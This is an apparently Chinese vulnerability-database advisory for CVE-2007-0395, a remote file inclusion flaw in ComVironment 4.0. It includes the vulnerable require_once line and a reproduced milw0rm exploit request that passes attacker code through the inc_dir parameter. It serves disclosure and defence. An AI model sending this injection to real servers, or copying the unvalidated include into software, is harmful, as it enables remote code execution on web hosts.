ComVironment grab_globals.lib.php脚本远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112041 漏洞类型 输入验证
发布时间 2007-01-18 更新时间 2007-01-22
CVE编号 CVE-2007-0395 CNNVD-ID CNNVD-200701-347
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3152
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-347
|漏洞详情
ComVironment是一种开源的基于PHP的Web内容管理系统。ComVironment的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。ComVironment的grab_globals.lib.php脚本没有正确验证inc_dir参数的输入,允许攻击者通过包含本地或外部资源任意文件导致执行任意PHP代码。
|漏洞EXP
/###################################################################\
#  ComVironment 4.0                                                 #
# =========================================================         #
# Published : 2007-01-18                                            #
# Remote: Yes                                                       #
# Site:http://switch.dl.sourceforge.net/sourceforge/comvironment/   #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.cN                                             #
# =====================================================             #
# ThanX=All My Friends- ABDULLAH00 - Jaeger                         #
# SpeciaL GreeTz : TrYaG-Team & 4lKaSrGoLd3N-Team                   #
\###################################################################/
/###################################################################\
# In :                                                              #
# /libraries/grab_globals.lib.php                                   #
# LiNe:                                                             #
# /3                                                                #
# Vulnerable Code:                                                  #
# require_once($inc_dir . 'libraries/grab_functions' . $ext);       #
# ExPlOiT :                                                         #
# /libraries/grab_globals.lib.php?inc_dir=[Evil-Code]               #
#                                                                   #
#                                                                   #
#             /#######################################\             #
#             #         TrYaG.Com & DwRaT.Com         #             #
#             \#######################################/             #
\###################################################################/

# milw0rm.com [2007-01-18]
|参考资料

来源:BID
名称:22108
链接:http://www.securityfocus.com/bid/22108
来源:MILW0RM
名称:3152
链接:http://www.milw0rm.com/exploits/3152
来源:OSVDB
名称:34621
链接:http://osvdb.org/34621
来源:XF
名称:comvironment-grabglobals-file-include(31564)
链接:http://xforce.iss.net/xforce/xfdb/31564
来源:VUPEN
名称:ADV-2007-0266
链接:http://www.frsirt.com/english/advisories/2007/0266
来源:MILW0RM
名称:3152
链接:http://milw0rm.com/exploits/3152